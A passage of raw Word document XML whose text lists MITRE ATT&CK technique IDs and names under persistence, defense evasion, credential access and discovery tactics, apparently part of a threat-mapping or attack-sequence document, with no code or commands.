        <w:t xml:space="preserve"> &lt;Access Token Manipulation&gt;:Create Process with Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E574095"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64555B9C" w14:textId="77777777" w:rsidR="00B1289F" w:rsidRPr="00B1289F" w:rsidRDefault="00B1289F" w:rsidP="004B1C5B">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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A85473"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 xml:space="preserve">Next tactic is TA0005 : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1036.004', 'T1070', 'T1620', 'T1140', 'T1218', 'T1218.005', 'T1202', 'T1036.003', 'T1574.002', 'T1574.013', 'T1070.003', 'T1220', 'T1218.011', 'T1218.010', 'T1497.001', 'T1221', 'T1553.002', 'T1036', 'T1078', 'T1027.002', 'T1036.005', 'T1562.004', 'T1564.001', 'T1055.001', 'T1134.002', 'T1542.003', 'T1562.001', 'T1070.004', 'T1070.006', 'T1027']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BCA562"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T1036.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Masquerade Task or Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25215FC5"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1070 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Indicator Removal on Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C63C0C4"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1620 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reflective Code Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6DB85"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1140 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58805F9F"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1218 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Binary Proxy Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE13C97"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T1218.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EDE40EE"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1202 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Indirect Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D964A"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T1036.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Rename System Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B9F0D"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66818D76"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T1574.013 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>KernelCallbackTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="131CDC9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T1070.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:Clear Command History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5547FFFF"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1220 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> XSL Script Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4634C3B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T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7145E4ED"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T1218.010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Regsvr32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216C4BF0"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T1497.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Virtualization/Sandbox Evasion&gt;:System Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA0922"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1221 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Template Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602D3A1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T1553.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Subvert Trust Controls&gt;:Code Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421B3F6E"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E21A04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E21A04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1036 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E21A04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D3116"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5430CF77"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T1027.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Software Packing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F93E417"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T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A23AB9"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T1562.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Disable or Modify System Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B38221"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T1564.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hide Artifacts&gt;:Hidden Files and Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12940B4D" w14:textId="77777777" w:rsidR="00B1289F" w:rsidRPr="006F632A" w:rsidRDefault="00B1289F" w:rsidP="00421F64">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F632A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1055.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F632A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Process Injection&gt;:Dynamic-link Library Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54823E3F"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T1134.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Access Token Manipulation&gt;:Create Process with Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239AD659"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T1542.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Pre-OS Boot&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="061DD78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T1562.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Disable or Modify Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E2C6B6"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EE1E71"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T1070.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timestomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5112A539"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1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5359632F"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1557.001', 'T1110', 'T1110.003', 'T1056.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273ED5FF"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T1557.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Adversary-in-the-Middle&gt;:LLMNR/NBT-NS Poisoning and SMB Relay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A45BE6"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1110 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C664C3D"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T1110.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Brute Force&gt;:Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B879726"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE8896"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1614.001', 'T1497.001', 'T1049', 'T1046', 'T1087.002', 'T1124', 'T1033', 'T1016', 'T1010', 'T1057', 'T1012', 'T1082', 'T1083']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678ABF07"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T1614.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Location Discovery&gt;:System Language Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF55E5"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T1497.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Virtualization/Sandbox Evasion&gt;:System Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1F10AD"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E728C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E728C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E728C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF988F"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1046 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161C8C61"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3E6738">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1087.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E6738">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Domain Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60422467"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1124 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Time Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647B61FA"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1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6A9680"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FB794B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB794B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB794B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501C8ECE"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lastRenderedPageBreak/>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Application Window Discovery</w:t>
      </w:r>
    </w:p>
